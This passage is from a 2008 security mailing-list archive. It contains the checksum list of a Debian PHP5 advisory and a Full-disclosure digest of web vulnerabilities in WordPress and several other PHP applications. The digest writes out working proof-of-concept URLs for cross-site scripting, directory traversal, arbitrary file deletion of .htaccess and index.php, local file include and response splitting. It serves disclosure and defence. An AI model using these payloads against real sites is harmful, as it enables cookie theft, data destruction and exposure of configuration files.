http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 18458 87904fa8c47e0edd37aada96ce48cffe http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 19182 e65cf71b220cf8285199bf26f028b8a2 http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 13754 6da392678ba54b1e2336d1bdac4b2d96 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 38018 4bc09fdad9d896ed63ffecb2686ec99a http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 36312 c33b7c7328a5d58e1e31132e9b54f626 http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 2515144 424bba8dbeeefbbc342fe2aca8369247 http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 12696 4f155f013111823f91ca622d32c3ccf8 http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 6742 71ba1ed48fac0882c25d25ff368e2954 http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 4897916 a1d3dab1092c0a9db396860f7a91ba2c http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 54040 a17e58c1874a192822815087bf7005ea http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_powerpc.deb Size/MD5 checksum: 2515672 45137c39bfafa49ddb8fee22dba548aa http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch8_powerpc.deb Size/MD5 checksum: 54036 e63dfa0d7fd89e38d987b215cd783d20 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch8_s390.deb Size/MD5 checksum: 5034458 0c812fc7e4633caebddde9694220b1f8 
http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_s390.deb Size/MD5 checksum: 37252 b43090877798d56187491ad6c61430a2 http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch8_s390.deb Size/MD5 checksum: 5108 930bb3f68cd7a882f686fd295bdcd52e http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch8_s390.deb Size/MD5 checksum: 37252 ea0c6190e057ca0bd1ee5615eb733a73 http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch8_s390.deb Size/MD5 checksum: 72576 7ab971ebbde629a327f9ededcf643d49 http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_s390.deb Size/MD5 checksum: 19328 a33635688df17ea3c112247c4a60c13b http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch8_s390.deb Size/MD5 checksum: 19330 38640be2f7fd52f92e282c909ddb832e http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_s390.deb Size/MD5 checksum: 2609706 0b0152099b17b0ea62a8612e48ce5bee http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_s390.deb Size/MD5 checksum: 18182 7c24136e683d84a226e5af9e6d6128b9 http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch8_s390.deb Size/MD5 checksum: 39180 8166fcf9116ec603fc3a4898d542ad27 http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_s390.deb Size/MD5 checksum: 13444 c7e0ab1b9c4be82c24a657b025d4f21a http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_s390.deb Size/MD5 checksum: 2610592 e1696ca2b132441d84685fff22fe390a http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch8_s390.deb Size/MD5 checksum: 40522 7902a4e8840eeef9101aceb124d3d57a http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch8_s390.deb Size/MD5 checksum: 37176 be86868f8715395847e57fec02783add http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_s390.deb Size/MD5 checksum: 
    5118 78d77bfe01f8b90eab1d7a481c2284c9
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum: 2609044 1d5c7ce92234e9bc595a002278a27e84
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 9190 ac473baeb26301752842cb2ced65114e
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 39184 afe1b482b1b552cf75a38c20e136ba75
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 342058 04c49f8368c4404c9a39a7bfc51e6fcf
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum: 9180 9711dca676560c44b3112be2287d4b2d
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 56324 c834ca90984e972d525a56952a496ad5
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 19592 aed64707fb7d24c31e39be41db3413d0
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 13396 9b79b59c124558e66a82d91a28e379dc
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 36084 48234dbc2db3b368958fe4c13834c053
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum: 18176 623c457f0fcc1841ac35b668e968766d
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum: 2537750 c046a32cbbd4b3a2fd6645c6ba35f52d
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum: 56316 058f048861b657b3de48adc357e90166
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 5478 c1739f755c92f0c2d4ba21092f8b894e
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum: 11952 fe0d7ab81216db22cee50cccda313e4f
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum: 342062 27c9d61c7d07ce4b78fd491a0912f73c
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum: 13400 11c384a487a7b1491af95483fda73afd
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 25022 73715319ea8e7b78211ef7b5464aed19
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum: 19586 fe8e94414aa4da4010c366525c45de82
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum: 36080 24e49013d05c56789f326cee8cbda9ac
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 72578 f9af1652c298d7bcaaa8bb8bc2d89453
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum: 2609588 a69dc7a2b66aa81d96647c1cb148dd58
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 37178 e092fc9a7040ca6409a2f0d0edb13094
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 11960 36b151c52dec82fa94ea91d2fa7dc3be
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum: 5468 335610031763d4cc12f95184486dbadb
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 5035632 ef6f870903ef4ee85488e98b703f24c9
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 220316 c884a33891a4fb02c6c93f20224fd598
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum: 13442 3253ab1775ccaf63855b28cae6f11bba
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 2538596 f0848822d0fea9a5d9a221ef8171a22e
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_s390.deb
    Size/MD5 checksum: 40526 980e0b60b30123b63e9900d409c8897e
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum: 220166 eb6b0530dfc7872d8f26dc780d774301
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch8_s390.deb
    Size/MD5 checksum: 25024 0319d2bb135bad651db7c837d1a3ef71

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 16238 2e7e9b8ab0a2c08e5196f48f3ba8e02e
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 32576 bb9fe4963a5711bf039c28f8d2892dc3
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 16578 416cbb879ba23ad867933c1595e62eb7
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 17444 197c152845cea014f4f921ea89a0e386
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 24626 74a449dd78ee441e09635f645b67f4b1
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 2404932 59990e6b8d57245b29b5813b69a62ad4
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 4670662 075be3e5eac42ab7933727ec09fbedac
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 10766 a94261cd688d3ff7c64923ef2d1a7a28
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 4864 f2b42bc3448bc85aacdc714384ed5bf7
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 34906 e8a660c13a1bf1d35a5e712872b2a478
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 214458 76a4e7e6811def8855f2ea217e1f37bb
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 62200 3451c54f15ece8bfc0672d04342b46b1
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 11678 5807d2d8c22d6abf72a7fba7a4bfea17
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 33184 66796603ff55635024689bb8490699bc
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 8270 1cf90c3f991e4a9510e01bf5e3bba4c9
  http://security.debian.org/pool/updates/main/p/php5/libapache-mod-php5_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 2405902 8981fb5589bf7c499c2d166369c40ad9
  http://security.debian.org/pool/updates/main/p/php5/php5-xmlrpc_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 34906 2776940111a53faf5d2767bfbb4119f7
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 33096 68ac2d3c9bb8238beeb4e0a82a91d3af
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 47908 573b43b0c6553fe0cee381af5177885c
  http://security.debian.org/pool/updates/main/p/php5/php5-mysql_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 62198 3665d88d02686919b42def31ea079d4d
  http://security.debian.org/pool/updates/main/p/php5/php5-cgi_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 4672026 41db855cfc3a1bd7b2bdcde31616d8fe
  http://security.debian.org/pool/updates/main/p/php5/php5-xsl_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 11674 2fe495656ab1fb1cb8b8f4ad17b68807
  http://security.debian.org/pool/updates/main/p/php5/php5-pspell_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 8268 0a232e1533bb9a18c5a24295b575e2fc
  http://security.debian.org/pool/updates/main/p/php5/php5-ldap_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 16576 7301ae9782758b661c0542c6c4709915
  http://security.debian.org/pool/updates/main/p/php5/php5-pgsql_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 47908 2701d2f9562c8ed980b34435ca2d2ed6
  http://security.debian.org/pool/updates/main/p/php5/php5-snmp_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 10766 231e1ec6b50e3b88671c64130ff31d03
  http://security.debian.org/pool/updates/main/p/php5/php5-mhash_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 4864 70a59260e4a7d669f63536d822afc0a0
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 342128 b1461c255c50b64c374f22bb4deed67a
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 12620 d323f669c911157aec3ed04b28fe7a79
  http://security.debian.org/pool/updates/main/p/php5/php5-tidy_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 16238 691416f8670c78cb7714d3a58e709458
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 2405686 2bf60f8fe3667c45fb6c4ea9da2b423c
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 2354794 3071ff8848fdbed3526cc94532e40264
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 4638 dbb58cfc47cdf65e59b7529ca59d42de
  http://security.debian.org/pool/updates/main/p/php5/php5-sqlite_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 32574 13f0e77899697db4cc0d28eaa90155b3
  http://security.debian.org/pool/updates/main/p/php5/libapache2-mod-php5_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 2406656 0401fc601122ae05b921f25ab37b95b1
  http://security.debian.org/pool/updates/main/p/php5/php5-common_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 214298 62a72421e29c87c4ce68d4f6e5bd9b7a
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 31514 b73d8ae66da8f0d8fb949529a6282988
  http://security.debian.org/pool/updates/main/p/php5/php5-sybase_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 17442 44afc84d1e432f202cbaca3cf53f9cbd
  http://security.debian.org/pool/updates/main/p/php5/php5-curl_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 24626 ece890b19b6e28e0bbb88f1014c24c96
  http://security.debian.org/pool/updates/main/p/php5/php5-recode_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 4638 5670a32e9cb61a2762d7b96f6ff3867a
  http://security.debian.org/pool/updates/main/p/php5/php5-odbc_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 31512 b9303d5095a2f3205ba9e78b9a7eb77c
  http://security.debian.org/pool/updates/main/p/php5/php5-cli_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 2354006 570f316a7cf6c7a77ba346ccc7c45b24
  http://security.debian.org/pool/updates/main/p/php5/php5-mcrypt_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 12618 b530e37e9474a5f9ecb325fa78970ff6
  http://security.debian.org/pool/updates/main/p/php5/php5-dev_5.2.0-8+etch9_sparc.deb
    Size/MD5 checksum: 342146 983c0a1ec54b68681c3204a06101acc6
  http://security.debian.org/pool/updates/main/p/php5/php5-gd_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 33188 7c20faa759f6deecca82800ad4bf2854
  http://security.debian.org/pool/updates/main/p/php5/php5-imap_5.2.0-8+etch8_sparc.deb
    Size/MD5 checksum: 33092 9f74b6bce6a279ea6d0af0cab7f0d067

These files will probably be moved into the stable distribution on its next update.
- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHfUR0Xm3vHE4uyloRArZEAJ43MLpFvfL8pzR4DAKA5lzW87+dewCgkMEr
hVmHymytYZeuBXazRrsxpuQ=
=OIyH
-----END PGP SIGNATURE-----

From 3APA3A at SECURITY.NNOV.RU Thu Jan 3 20:50:08 2008
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Thu, 3 Jan 2008 23:50:08 +0300
Subject: [Full-disclosure] securityvulns.com russian vulnerabilities digest
Message-ID: <854896555.20080103235008@SECURITY.NNOV.RU>

Dear bugtraq,

Below is a digest of vulnerabilities published by http://securityvulns.com/ and believed to be previously unpublished in English. All vulnerabilities were reported by MustLive (http://websecurity.com.ua/).

1. AwesomeTemplateEngine cross-site scripting

Multiple cross-site scripting (requires register_globals):

http://site/templates/example_template.php?data[title]=%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[message]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][item]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[table][1][url]=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/templates/example_template.php?data[poweredby]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Original article (in Russian): http://securityvulns.ru/Sdocument784.html
Additional details (in Ukrainian): http://websecurity.com.ua/1694/

2. WordPress multiple security vulnerabilities:

2.1 Information disclosure (WordPress 2.2/2.3)

An invalid request discloses the database structure and local paths:

http://site/?feed=rss2&p=1

Original article (in Russian): http://securityvulns.ru/Sdocument663.html
Additional details (in Ukrainian): http://websecurity.com.ua/1634/

2.2 Cross-site scripting (WordPress <= 2.0.9)

http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22
http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22

Original article (in Russian): http://securityvulns.ru/Sdocument714.html
Additional details (in Ukrainian): http://websecurity.com.ua/1658/

2.3 Directory traversal, arbitrary file deletion, denial of service and cross-site scripting via wp-db-backup.php

Directory traversal (WordPress <= 2.0.3):

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

Arbitrary file deletion and DoS (WordPress <= 2.0.3):

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php

XSS (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x):

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Original article (in Russian): http://securityvulns.ru/Sdocument755.html
Additional details (in Ukrainian): http://websecurity.com.ua/1676/

2.4 Local file include, directory traversal and full path disclosure (WordPress <= 2.0.11 and potentially 2.1.x, 2.2.x, 2.3.x)

Full path disclosure:

http://site/wp-admin/admin.php?import=\..\..\wp-config
http://site/wp-admin/themes.php?page=
http://site/wp-admin/edit.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/templates.php?file=
http://site/wp-admin/templates.php?page=
http://site/wp-admin/edit-pages.php?page=
http://site/wp-admin/categories.php?page=
http://site/wp-admin/edit-comments.php?page=
http://site/wp-admin/moderation.php?page=
http://site/wp-admin/post.php?page=
http://site/wp-admin/page-new.php?page=
http://site/wp-admin/index.php?page=
http://site/wp-admin/link-manager.php?page=
http://site/wp-admin/link-add.php?page=
http://site/wp-admin/link-categories.php?page=
http://site/wp-admin/link-import.php?page=
http://site/wp-admin/theme-editor.php?page=
http://site/wp-admin/plugins.php?page=
http://site/wp-admin/plugin-editor.php?page=
http://site/wp-admin/profile.php?page=
http://site/wp-admin/users.php?page=
http://site/wp-admin/options-general.php?page=
http://site/wp-admin/options-writing.php?page=
http://site/wp-admin/options-reading.php?page=
http://site/wp-admin/options-discussion.php?page=
http://site/wp-admin/options-permalink.php?page=
http://site/wp-admin/options-misc.php?page=
http://site/wp-admin/import.php?page=
http://site/wp-admin/admin.php?page=
http://site/wp-admin/admin-footer.php
http://site/wp-admin/admin-functions.php
http://site/wp-admin/edit-form.php
http://site/wp-admin/edit-form-advanced.php
http://site/wp-admin/edit-form-comment.php
http://site/wp-admin/edit-link-form.php
http://site/wp-admin/edit-page-form.php
http://site/wp-admin/menu.php
http://site/wp-admin/menu-header.php
http://site/wp-admin/import/blogger.php
http://site/wp-admin/import/dotclear.php
http://site/wp-admin/import/greymatter.php
http://site/wp-admin/import/livejournal.php
http://site/wp-admin/import/mt.php
http://site/wp-admin/import/rss.php
http://site/wp-admin/import/textpattern.php
http://site/wp-admin/bookmarklet.php?page=
http://site/wp-admin/cat-js.php?page=
http://site/wp-admin/inline-uploading.php?page=
http://site/wp-admin/options.php?page=
http://site/wp-admin/profile-update.php?page=
http://site/wp-admin/sidebar.php?page=
http://site/wp-admin/user-edit.php?page=

Local file include and directory traversal:

http://site/wp-admin/admin.php?import=\..\..\file
http://site/wp-admin/themes.php?page=\..\..\file.php
http://site/wp-admin/themes.php?page=\..\..\.htaccess
http://site/wp-admin/edit.php?page=\..\..\file.php
http://site/wp-admin/edit.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\file.php
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/templates.php?page=\..\..\file.php
http://sites/wp-admin/templates.php?page=\..\..\.htaccess
http://site/wp-admin/edit-pages.php?page=\..\..\.htaccess
http://site/wp-admin/categories.php?page=\..\..\.htaccess
http://site/wp-admin/edit-comments.php?page=\..\..\.htaccess
http://site/wp-admin/moderation.php?page=\..\..\.htaccess
http://site/wp-admin/post.php?page=\..\..\.htaccess
http://site/wp-admin/page-new.php?page=\..\..\.htaccess
http://site/wp-admin/index.php?page=\..\..\file.php
http://site/wp-admin/index.php?page=\..\..\.htaccess
http://site/wp-admin/link-manager.php?page=\..\..\.htaccess
http://site/wp-admin/link-add.php?page=\..\..\.htaccess
http://site/wp-admin/link-categories.php?page=\..\..\.htaccess
http://site/wp-admin/link-import.php?page=\..\..\.htaccess
http://site/wp-admin/theme-editor.php?page=\..\..\.htaccess
http://site/wp-admin/plugin-editor.php?page=\..\..\.htaccess
http://site/wp-admin/profile.php?page=\..\..\.htaccess
http://site/wp-admin/users.php?page=\..\..\.htaccess
http://site/wp-admin/options-general.php?page=\..\..\.htaccess
http://site/wp-admin/options-writing.php?page=\..\..\.htaccess
http://site/wp-admin/options-reading.php?page=\..\..\.htaccess
http://site/wp-admin/options-discussion.php?page=\..\..\.htaccess
http://site/wp-admin/options-permalink.php?page=\..\..\.htaccess
http://site/wp-admin/options-misc.php?page=\..\..\.htaccess
http://site/wp-admin/import.php?page=\..\..\.htaccess
http://site/wp-admin/admin.php?page=\..\..\.htaccess
http://site/wp-admin/bookmarklet.php?page=\..\..\.htaccess
http://site/wp-admin/cat-js.php?page=\..\..\.htaccess
http://site/wp-admin/inline-uploading.php?page=\..\..\.htaccess
http://site/wp-admin/options.php?page=\..\..\.htaccess
http://site/wp-admin/profile-update.php?page=\..\..\.htaccess
http://site/wp-admin/sidebar.php?page=\..\..\.htaccess
http://site/wp-admin/user-edit.php?page=\..\..\.htaccess

Arbitrary file edit:

http://site/wp-admin/templates.php?file=\..\..\file

Attacks with a backslash are possible in the Windows version.

Original article (in Russian):
http://securityvulns.ru/Sdocument762.html
http://securityvulns.ru/Sdocument768.html
http://securityvulns.ru/Sdocument773.html
http://securityvulns.ru/Sdocument772.html

Additional details (in Ukrainian):
http://websecurity.com.ua/1679/
http://websecurity.com.ua/1683/
http://websecurity.com.ua/1686/
http://websecurity.com.ua/1687/

3. Cross-site scripting and denial of service in PRO-Search <= 0.17

XSS:

http://site/?prot=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?host=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?path=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?name=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?ext=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?size=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?search_days=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/?show_page=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Denial of service:

http://site/?show_page=20000&time=0

Original article (in Russian): http://securityvulns.ru/Sdocument731.html
Additional details (in Ukrainian): http://websecurity.com.ua/1259/

4. Persistent cross-site scripting and request forgery in WP-ContactForm <= 1.5 alpha (WordPress plugin)

POST request to http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php with different form fields.

Exploits:

http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS2.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS3.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS4.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF5.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS5.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS6.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS7.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF8.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS8.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20CSRF9.html
http://websecurity.com.ua/uploads/2007/MoBiC/WP-ContactForm%20XSS9.html

Original article (in Russian):
http://securityvulns.ru/Sdocument667.html
http://securityvulns.ru/Sdocument546.html

Additional details (in Ukrainian):
http://websecurity.com.ua/1641/
http://websecurity.com.ua/1600/

5. RotaBanner Local <= 3 cross-site scripting

http://site/account/index.html?user=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/account/index.html?drop=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Original article (in Russian): http://securityvulns.ru/Sdocument625.html
Additional details (in Ukrainian): http://websecurity.com.ua/1442/

6. ExpressionEngine <= 1.2.1 response splitting and cross-site scripting

http://site/index.php?URL=%0AContent-Type:html%0A%0A%3Cscript%3Ealert(document.cookie)%3C/script%3E

Original article (in Russian): http://securityvulns.ru/Sdocument472.html
Additional details (in Ukrainian): http://websecurity.com.ua/1454/

-=-=-=-

There are also a few vulnerabilities published in English as part of the Month of Bugs in CAPTCHA:

Cryptographp <= 1.2 WordPress plugin multiple persistent cross-site scripting
Original article: http://websecurity.com.ua/1596/

XSS in Math Comment Spam Protection < 2.2
Original article: http://websecurity.com.ua/1576/

XSS in Captcha! <= 2.5d
Original article: http://websecurity.com.ua/1588/

--
http://securityvulns.com/
      /\_/\
     { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }  You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                    |/

From jmm at debian.org Thu Jan 3 21:15:41 2008
From: jmm at debian.org (Moritz Muehlenhoff)
Date: Thu, 3 Jan 2008 22:15:41 +0100
